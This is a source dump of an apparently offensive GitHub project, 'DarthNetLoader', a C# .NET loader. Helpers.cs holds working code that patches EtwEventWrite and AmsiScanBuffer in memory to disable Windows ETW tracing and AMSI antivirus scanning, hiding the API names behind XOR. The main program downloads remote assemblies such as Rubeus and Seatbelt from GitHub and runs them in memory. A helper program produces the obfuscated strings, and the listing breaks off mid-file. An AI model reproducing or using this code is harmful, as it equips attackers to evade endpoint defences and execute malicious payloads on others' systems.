├── .gitignore ├── .vs └── DarthLoader │ └── v16 │ └── .suo ├── DarthLoader.sln ├── DarthLoader ├── App.config ├── DarthLoader.cs ├── DarthLoader.csproj ├── Helpers.cs ├── Properties │ └── AssemblyInfo.cs └── obj │ ├── Debug │ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs │ ├── DarthLoader.csproj.AssemblyReference.cache │ └── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Release │ └── .NETFramework,Version=v4.6.AssemblyAttributes.cs │ └── x64 │ └── Release │ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs │ ├── DarthLoader.csproj.AssemblyReference.cache │ ├── DarthLoader.csproj.CoreCompileInputs.cache │ ├── DarthLoader.csproj.FileListAbsolute.txt │ ├── DarthLoader.exe │ └── DarthLoader.pdb ├── DarthLoaderHelper ├── .vs │ └── DarthLoaderHelper │ │ └── v16 │ │ └── .suo ├── DarthLoaderHelper.sln └── DarthLoaderHelper │ ├── App.config │ ├── DarthLoaderHelper.cs │ ├── DarthLoaderHelper.csproj │ ├── Properties │ └── AssemblyInfo.cs │ └── obj │ ├── Debug │ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs │ ├── DarthLoaderHelper.csproj.AssemblyReference.cache │ └── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Release │ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs │ └── DesignTimeResolveAssemblyReferencesInput.cache │ └── x64 │ └── Release │ ├── .NETFramework,Version=v4.6.AssemblyAttributes.cs │ ├── DarthLoaderHelper.csproj.AssemblyReference.cache │ ├── DarthLoaderHelper.csproj.CoreCompileInputs.cache │ ├── DarthLoaderHelper.csproj.FileListAbsolute.txt │ ├── DarthLoaderHelper.exe │ ├── DarthLoaderHelper.pdb │ └── DesignTimeResolveAssemblyReferencesInput.cache └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # General 2 | .DS_Store 3 | .AppleDouble 4 | .LSOverride 5 | 6 | # Icon must end with two \r 7 | Icon 8 | 9 | 10 | # Thumbnails 11 | ._* 12 | 13 | # Files that might appear in the root of a volume 14 | .DocumentRevisions-V100 15 | .fseventsd 16 | .Spotlight-V100 17 | 
.TemporaryItems 18 | .Trashes 19 | .VolumeIcon.icns 20 | .com.apple.timemachine.donotpresent 21 | 22 | # Directories potentially created on remote AFP share 23 | .AppleDB 24 | .AppleDesktop 25 | Network Trash Folder 26 | Temporary Items 27 | .apdisk 28 | .obsidian 29 | -------------------------------------------------------------------------------- /.vs/DarthLoader/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/.vs/DarthLoader/v16/.suo -------------------------------------------------------------------------------- /DarthLoader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32630.194 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarthLoader", "DarthLoader\DarthLoader.csproj", "{58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|x64.ActiveCfg = Debug|x64 19 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Debug|x64.Build.0 = Debug|x64 20 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|x64.ActiveCfg = Release|x64 23 | 
{58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {9931390D-5E24-4481-9894-109E44E2DB67} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DarthLoader/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DarthLoader/DarthLoader.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Reflection; 3 | using System.Threading; 4 | using System.Net; 5 | 6 | namespace DarthLoader 7 | { 8 | class DarthLoader 9 | { 10 | public static string FunctionsXorKey = ""; 11 | 12 | static byte[] FetchRemoteAssembly(string url, string xorKey = "") 13 | { 14 | byte[] programBytes = null; 15 | ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12; 16 | WebClient webClient = new WebClient(); 17 | int count = 2; 18 | 19 | while (count >= 0 && programBytes == null) 20 | { 21 | try 22 | { 23 | programBytes = Helpers.XorBytes(webClient.DownloadData(url), xorKey); 24 | } 25 | catch (WebException) 26 | { 27 | Console.WriteLine("[!] Assembly not found!"); 28 | Console.WriteLine($"[+] Retrying download..."); 29 | count--; 30 | Thread.Sleep(2000); 31 | } 32 | catch (NotSupportedException) 33 | { 34 | Console.WriteLine("[!] URL not valid. 
Check URL argument."); 35 | Environment.Exit(-1); 36 | } 37 | } 38 | return programBytes; 39 | } 40 | 41 | static void Main(string[] args) 42 | { 43 | string banner = 44 | @" 45 | _______ __ __ __ __ 46 | | \ | \ | \ | \ | \ 47 | | $$$$$$$\ ______ ______ _| $$_ | $$____ | $$ ______ ______ ____| $$ ______ ______ 48 | | $$ | $$| \ / | $$ \ | $$ \| $$ / \ | \ / $$/ \ / \ 49 | | $$ | $$ \$$$$$$| $$$$$$\$$$$$$ | $$$$$$$| $$ | $$$$$$\ \$$$$$$| $$$$$$| $$$$$$| $$$$$$\ 50 | | $$ | $$/ $| $$ \$$| $$ __| $$ | $| $$ | $$ | $$/ $| $$ | $| $$ $| $$ \$$ 51 | | $$__/ $| $$$$$$| $$ | $$| | $$ | $| $$____| $$__/ $| $$$$$$| $$__| $| $$$$$$$| $$ 52 | | $$ $$\$$ $| $$ \$$ $| $$ | $| $$ \$$ $$\$$ $$\$$ $$\$$ | $$ 53 | \$$$$$$$ \$$$$$$$\$$ \$$$$ \$$ \$$\$$$$$$$$\$$$$$$ \$$$$$$$ \$$$$$$$ \$$$$$$$\$$ 54 | "; 55 | 56 | if (args.Length == 6) 57 | { 58 | if (args[0] == "--FunctionsXorKey" && args[2] == "--FilePath" && args[4] == "--Args") 59 | { 60 | FunctionsXorKey = args[1]; 61 | string filePath = args[3]; 62 | string assemblyArgs = args[5]; 63 | Helpers.FirstHelperFunction(); 64 | Helpers.SecondHelperFunction(); 65 | 66 | if (!filePath.StartsWith("http")) 67 | { 68 | Console.WriteLine(banner); 69 | Console.WriteLine($"[+] Loading assembly from file path: {filePath}"); 70 | Console.WriteLine("[+] Assembly loaded into memory... 
"); 71 | Console.WriteLine("[+] Hit any key to run..."); 72 | Console.ReadKey(); 73 | Helpers.ExecuteLocalFileArgs(filePath, assemblyArgs); 74 | } 75 | } 76 | else if (args[0] == "--FunctionsXorKey" && args[2] == "--FilePath" && args[4] == "--XorKey") 77 | { 78 | FunctionsXorKey = args[1]; 79 | string filePath = args[3]; 80 | string xorKey = args[5]; 81 | Helpers.FirstHelperFunction(); 82 | Helpers.SecondHelperFunction(); 83 | 84 | if (filePath.StartsWith("http")) 85 | { 86 | Console.WriteLine(banner); 87 | Console.WriteLine($"[*] Downloading and encrypting assembly with the key: {xorKey}"); 88 | byte[] assemblyBytes = FetchRemoteAssembly(filePath, xorKey); 89 | Console.WriteLine("[+] Encrypted assembly loaded into memory... "); 90 | Console.WriteLine("[+] Hit any key to run..."); 91 | Console.ReadKey(); 92 | Helpers.ExecuteRemoteAssembly(assemblyBytes, xorKey); 93 | } 94 | } 95 | } 96 | else if (args.Length == 4) 97 | { 98 | if (args[0] == "--FunctionsXorKey" && args[2] == "--FilePath") 99 | { 100 | FunctionsXorKey = args[1]; 101 | string filePath = args[3]; 102 | Helpers.FirstHelperFunction(); 103 | Helpers.SecondHelperFunction(); 104 | 105 | if (!filePath.StartsWith("http")) 106 | { 107 | Console.WriteLine(banner); 108 | Console.WriteLine($"[+] Loading assembly from file path: {filePath}"); 109 | Console.WriteLine("[+] Assembly loaded into memory... 
"); 110 | Console.WriteLine("[+] Hit any key to run..."); 111 | Console.ReadKey(); 112 | Helpers.ExecuteLocalFile(filePath); 113 | } 114 | } 115 | } 116 | else if (args.Length == 8) 117 | { 118 | if ((args[0] == "--FunctionsXorKey" && args[2] == "--FilePath" && args[4] == "--Args" && args[6] == "--XorKey")) 119 | { 120 | FunctionsXorKey = args[1]; 121 | string filePath = args[3]; 122 | string assemblyArgs = args[5]; 123 | string xorKey = args[7]; 124 | Helpers.FirstHelperFunction(); 125 | Helpers.SecondHelperFunction(); 126 | 127 | if (filePath.StartsWith("http")) 128 | { 129 | Console.WriteLine(banner); 130 | Console.WriteLine($"[*] Downloading and encrypting assembly with the key: {xorKey}"); 131 | byte[] assemblyBytes = FetchRemoteAssembly(filePath, xorKey); 132 | Console.WriteLine("[+] Encrypted assembly loaded into memory... "); 133 | Console.WriteLine("[+] Hit any key to run..."); 134 | Console.ReadKey(); 135 | Helpers.ExecuteRemoteAssemblyArgs(assemblyBytes, xorKey, assemblyArgs); 136 | } 137 | } 138 | } 139 | else 140 | { 141 | Console.WriteLine(banner); 142 | Console.WriteLine("==================== USAGE: ===================="); 143 | Console.WriteLine(""); 144 | Console.WriteLine("--FunctionsXorKey : Xor key to decrypt function strings from DarthLoaderHelper.exe"); 145 | Console.WriteLine("--FilePath : a local file path or URL to load a .Net asseembly from"); 146 | Console.WriteLine("--Args : Xor key to decrypt function strings from DarthLoaderHelper.exe"); 147 | Console.WriteLine("--XorKey : Xor key used to encrypt/decrypt .Net assembly from URL"); 148 | Console.WriteLine(""); 149 | Console.WriteLine("==================== EXAMPLES: ===================="); 150 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 --FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Seatbelt.exe --Args AntiVirus --XorKey test"); 151 | Console.WriteLine(""); 152 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 
--FilePath https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.5_x64/Rubeus.exe --XorKey test"); 153 | Console.WriteLine(""); 154 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\devin\Desktop\Hello.exe"); 155 | Console.WriteLine(""); 156 | Console.WriteLine(@"DarthLoader.exe --FunctionsXorKey testing123 --FilePath C:\Users\devin\Desktop\Hello.exe --Args test"); 157 | Console.WriteLine(""); 158 | } 159 | } 160 | } 161 | } 162 | -------------------------------------------------------------------------------- /DarthLoader/DarthLoader.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {58B2282C-AE7F-4C6A-99B9-7BF3C1FFD7A7} 8 | Exe 9 | DarthLoader 10 | DarthLoader 11 | v4.6 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | true 37 | bin\x64\Debug\ 38 | DEBUG;TRACE 39 | full 40 | x64 41 | 7.3 42 | prompt 43 | true 44 | 45 | 46 | bin\x64\Release\ 47 | TRACE 48 | true 49 | pdbonly 50 | x64 51 | 7.3 52 | prompt 53 | true 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /DarthLoader/Helpers.cs: -------------------------------------------------------------------------------- 1 | // code copied from https://github.com/cobbr/SharpSploit/tree/master/SharpSploit/Evasion 2 | 3 | using System; 4 | using System.Text; 5 | using System.Runtime.InteropServices; 6 | using System.Reflection; 7 | 8 | namespace DarthLoader 9 | { 10 | class Helpers 11 | { 12 | private static string xorKey = DarthLoader.FunctionsXorKey; 13 | 14 | //etwbypass 15 | public static string etwBypassString = XorString(ConvertHex("11110416101E064241"), 
xorKey); 16 | 17 | // amsibypass 18 | public static string amsiBypassString = XorString(ConvertHex("1508001D0B1717504140"), xorKey); 19 | 20 | // ntdll.dll 21 | public static string ntDllString = XorString(ConvertHex("1A1117180540035D5E"), xorKey); 22 | 23 | // EtwEventWrite 24 | public static string etwEventWriteString = XorString(ConvertHex("311104311F0B094565411D1116"), xorKey); 25 | 26 | // amsi.dll 27 | public static string amsiDllString = XorString(ConvertHex("1508001D470A0B5D"), xorKey); 28 | 29 | // AmsiScanBuffer 30 | public static string amsiScanBufferString = XorString(ConvertHex("3508001D3A0D065F704612031606"), xorKey); 31 | 32 | [DllImport("kernel32")] 33 | static extern IntPtr GetProcAddress( 34 | IntPtr hModule, 35 | string procName); 36 | 37 | [DllImport("kernel32")] 38 | static extern IntPtr LoadLibrary( 39 | string name); 40 | 41 | [DllImport("kernel32")] 42 | static extern bool VirtualProtect( 43 | IntPtr lpAddress, 44 | UIntPtr dwSize, 45 | uint flNewProtect, 46 | out uint lpflOldProtect); 47 | 48 | static bool Is64Bit 49 | { 50 | get 51 | { 52 | return IntPtr.Size == 8; 53 | } 54 | } 55 | 56 | static byte[] Patch(string function) 57 | { 58 | byte[] patch; 59 | if (function.ToLower() == "firsthelperfunction") 60 | { 61 | if (Is64Bit) 62 | { 63 | patch = new byte[2]; 64 | patch[0] = 0xc3; 65 | patch[1] = 0x00; 66 | } 67 | else 68 | { 69 | patch = new byte[3]; 70 | patch[0] = 0xc2; 71 | patch[1] = 0x14; 72 | patch[2] = 0x00; 73 | } 74 | return patch; 75 | } 76 | else if (function.ToLower() == "secondhelperfunction") 77 | { 78 | if (Is64Bit) 79 | { 80 | patch = new byte[6]; 81 | patch[0] = 0xB8; 82 | patch[1] = 0x57; 83 | patch[2] = 0x00; 84 | patch[3] = 0x07; 85 | patch[4] = 0x80; 86 | patch[5] = 0xC3; 87 | } 88 | else 89 | { 90 | patch = new byte[8]; 91 | patch[0] = 0xB8; 92 | patch[1] = 0x57; 93 | patch[2] = 0x00; 94 | patch[3] = 0x07; 95 | patch[4] = 0x80; 96 | patch[5] = 0xC2; 97 | patch[6] = 0x18; 98 | patch[7] = 0x00; 99 | 100 | } 101 | 
return patch; 102 | } 103 | else throw new ArgumentException("[!] Error in function check!"); 104 | } 105 | 106 | public static void FirstHelperFunction() 107 | { 108 | string traceloc = ntDllString; 109 | string magicFunction = etwEventWriteString; 110 | IntPtr ntdllAddr = LoadLibrary(traceloc); 111 | IntPtr traceAddr = GetProcAddress(ntdllAddr, magicFunction); 112 | byte[] magicVoodoo = Patch("FirstHelperFunction"); 113 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect); 114 | Marshal.Copy(magicVoodoo, 0, traceAddr, magicVoodoo.Length); 115 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect); 116 | Console.WriteLine("[!] ETW bypassed!"); 117 | } 118 | public static void SecondHelperFunction() 119 | { 120 | string avloc = amsiDllString; 121 | string magicFunction = amsiScanBufferString; 122 | IntPtr avAddr = LoadLibrary(avloc); 123 | IntPtr traceAddr = GetProcAddress(avAddr, magicFunction); 124 | byte[] magicVoodoo = Patch("SecondHelperFunction"); 125 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect); 126 | Marshal.Copy(magicVoodoo, 0, traceAddr, magicVoodoo.Length); 127 | VirtualProtect(traceAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect); 128 | Console.WriteLine("[!] 
Amsi bypassed!"); 129 | } 130 | 131 | public static byte[] XorBytes(byte[] inputByteArray, string keyString) 132 | { 133 | byte[] key = Encoding.UTF8.GetBytes(keyString); 134 | byte[] data = new byte[inputByteArray.Length]; 135 | 136 | for (int i = 0; i < inputByteArray.Length; i++) 137 | { 138 | data[i] = (byte)(inputByteArray[i] ^ key[i % key.Length]); 139 | } 140 | return data; 141 | } 142 | 143 | public static string XorString(string stringInput, string key) 144 | { 145 | StringBuilder sb = new StringBuilder(); 146 | for (int i = 0; i < stringInput.Length; i++) 147 | { 148 | sb.Append((char)(stringInput[i] ^ key[(i % key.Length)])); 149 | } 150 | String result = sb.ToString(); 151 | return result; 152 | } 153 | 154 | public static string ConvertHex(String hexString) 155 | { 156 | try 157 | { 158 | string ascii = string.Empty; 159 | 160 | for (int i = 0; i < hexString.Length; i += 2) 161 | { 162 | String hs = string.Empty; 163 | hs = hexString.Substring(i, 2); 164 | uint decval = System.Convert.ToUInt32(hs, 16); 165 | char character = System.Convert.ToChar(decval); 166 | ascii += character; 167 | 168 | } 169 | return ascii; 170 | } 171 | catch 172 | { 173 | Console.WriteLine("[!] 
Error converting hex to string!"); 174 | } 175 | return string.Empty; 176 | } 177 | 178 | public static void ExecuteLocalFileArgs(string FilePath, string args) 179 | { 180 | Assembly dotNetProgram = Assembly.LoadFile(FilePath); 181 | string[] assArgs = new string[] { args }; 182 | dotNetProgram.EntryPoint.Invoke(null, new object[] { assArgs }); 183 | } 184 | 185 | public static void ExecuteLocalFile(string FilePath) 186 | { 187 | Assembly dotNetProgram = Assembly.LoadFile(FilePath); 188 | dotNetProgram.EntryPoint.Invoke(null, new object[] { null }); 189 | } 190 | 191 | public static void ExecuteRemoteAssemblyArgs(byte[] programBytes, string xorKey, string args) 192 | { 193 | try 194 | { 195 | Assembly dotNetProgram = Assembly.Load(XorBytes(programBytes, xorKey)); 196 | string[] assArgs = new string[] { args }; 197 | dotNetProgram.EntryPoint.Invoke(null, new object[] { assArgs }); 198 | } 199 | catch (TargetInvocationException) 200 | { 201 | Console.WriteLine("[!] Missing arguments for loaded assembly!"); 202 | Environment.Exit(-1); 203 | } 204 | } 205 | 206 | public static void ExecuteRemoteAssembly(byte[] programBytes, string xorKey) 207 | { 208 | try 209 | { 210 | Assembly dotNetProgram = Assembly.Load(XorBytes(programBytes, xorKey)); 211 | dotNetProgram.EntryPoint.Invoke(null, new object[] { null }); 212 | } 213 | catch (TargetInvocationException) 214 | { 215 | Console.WriteLine("[!] Missing arguments for loaded assembly!"); 216 | Environment.Exit(-1); 217 | } 218 | } 219 | } 220 | } 221 | -------------------------------------------------------------------------------- /DarthLoader/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. 
Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DarthLoader")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DarthLoader")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("58b2282c-ae7f-4c6a-99b9-7bf3c1ffd7a7")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DarthLoader/obj/Debug/.NETFramework,Version=v4.6.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")] 5 | -------------------------------------------------------------------------------- /DarthLoader/obj/Debug/DarthLoader.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/Debug/DarthLoader.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /DarthLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /DarthLoader/obj/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")] 5 | -------------------------------------------------------------------------------- /DarthLoader/obj/x64/Release/.NETFramework,Version=v4.6.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")] 5 | -------------------------------------------------------------------------------- /DarthLoader/obj/x64/Release/DarthLoader.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /DarthLoader/obj/x64/Release/DarthLoader.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 8e7733187352e449bebc69a99c12cb1f4b71364e 2 | 
-------------------------------------------------------------------------------- /DarthLoader/obj/x64/Release/DarthLoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release\DarthLoader.exe.config 2 | D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release\DarthLoader.exe 3 | D:\SecToolDev\DarthLoader\DarthLoader\bin\x64\Release\DarthLoader.pdb 4 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.csproj.CoreCompileInputs.cache 5 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.exe 6 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.pdb 7 | D:\SecToolDev\DarthLoader\DarthLoader\obj\x64\Release\DarthLoader.csproj.AssemblyReference.cache 8 | -------------------------------------------------------------------------------- /DarthLoader/obj/x64/Release/DarthLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/x64/Release/DarthLoader.exe -------------------------------------------------------------------------------- /DarthLoader/obj/x64/Release/DarthLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoader/obj/x64/Release/DarthLoader.pdb -------------------------------------------------------------------------------- /DarthLoaderHelper/.vs/DarthLoaderHelper/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4rthMaulCop/DarthNetLoader/e9fa453b8fce3bf94cdc7fca3f1b3efd14a41262/DarthLoaderHelper/.vs/DarthLoaderHelper/v16/.suo -------------------------------------------------------------------------------- 
/DarthLoaderHelper/DarthLoaderHelper.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32630.194 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarthLoaderHelper", "DarthLoaderHelper\DarthLoaderHelper.csproj", "{4512803D-EE69-4DE9-9D47-56F1909C6049}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|x64.ActiveCfg = Debug|x64 19 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Debug|x64.Build.0 = Debug|x64 20 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|x64.ActiveCfg = Release|x64 23 | {4512803D-EE69-4DE9-9D47-56F1909C6049}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {B9D48E68-2FB2-4DB2-AABC-ED834CB109AF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 
-------------------------------------------------------------------------------- /DarthLoaderHelper/DarthLoaderHelper/DarthLoaderHelper.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | 4 | namespace DarthLoaderHelper 5 | { 6 | class DarthLoaderHelper 7 | { 8 | public static string xorKey = ""; 9 | 10 | public static string XorString(string stringInput, string key) 11 | { 12 | StringBuilder sb = new StringBuilder(); 13 | for (int i = 0; i < stringInput.Length; i++) 14 | sb.Append((char)(stringInput[i] ^ key[(i % key.Length)])); 15 | String result = sb.ToString(); 16 | return result; 17 | } 18 | public static string Base64Encode(string plainText) 19 | { 20 | var plainTextBytes = Encoding.UTF8.GetBytes(plainText); 21 | return Convert.ToBase64String(plainTextBytes); 22 | } 23 | 24 | public static byte[] XorBytes(byte[] inputByteArray, string keyString) 25 | { 26 | byte[] key = Encoding.UTF8.GetBytes(keyString); 27 | byte[] data = new byte[inputByteArray.Length]; 28 | 29 | for (int i = 0; i < inputByteArray.Length; i++) 30 | { 31 | data[i] = (byte)(inputByteArray[i] ^ key[i % key.Length]); 32 | } 33 | return data; 34 | } 35 | 36 | public static string ConvertStringToBytes(string input) 37 | { 38 | byte[] bytes = Encoding.Default.GetBytes(input); 39 | byte[] xoredBytes = XorBytes(bytes, xorKey); 40 | return BitConverter.ToString(xoredBytes).Replace("-", ""); 41 | } 42 | 43 | public static string ConvertHex(String hexString) 44 | { 45 | try 46 | { 47 | string ascii = string.Empty; 48 | 49 | for (int i = 0; i < hexString.Length; i += 2) 50 | { 51 | String hs = string.Empty; 52 | 53 | hs = hexString.Substring(i, 2); 54 | uint decval = Convert.ToUInt32(hs, 16); 55 | char character = Convert.ToChar(decval); 56 | ascii += character; 57 | } 58 | return ascii; 59 | } 60 | catch (Exception ex) { Console.WriteLine(ex.Message); } 61 | return string.Empty; 62 | } 63 | 64 | static void Main(string[] 
args) 65 | { 66 | try 67 | { 68 | xorKey = args[0]; 69 | 70 | // strings to encrypt 71 | string etwBypass = "etwbypass"; 72 | string amsi = "amsibypass"; 73 | string ntdDll = "ntdll.dll"; 74 | string etw = "EtwEventWrite"; 75 | string amsiDll = "amsi.dll"; 76 | string amsiBuffer = "AmsiScanBuffer"; 77 | 78 | Console.WriteLine($"[+] Encrypting with key: {xorKey}"); 79 | Console.WriteLine($"[+] Encrypted string 'etwbypass': {ConvertStringToBytes(etwBypass)}"); 80 | Console.WriteLine($"[+] Encrypted string 'amsibypass': {ConvertStringToBytes(amsi)}"); 81 | Console.WriteLine($"[+] Encrypted string 'ntdll.dll': {ConvertStringToBytes(ntdDll)}"); 82 | Console.WriteLine($"[+] Encrypted string 'EtwEventWrite': {ConvertStringToBytes(etw)}"); 83 | Console.WriteLine($"[+] Encrypted string 'amsi.dll': {ConvertStringToBytes(amsiDll)}"); 84 | Console.WriteLine($"[+] Encrypted string 'AmsiScanBuffer': {ConvertStringToBytes(amsiBuffer)}"); 85 | 86 | // Converting back 87 | //string hexASCIIVar = ConvertHex(encryptedPayload); 88 | 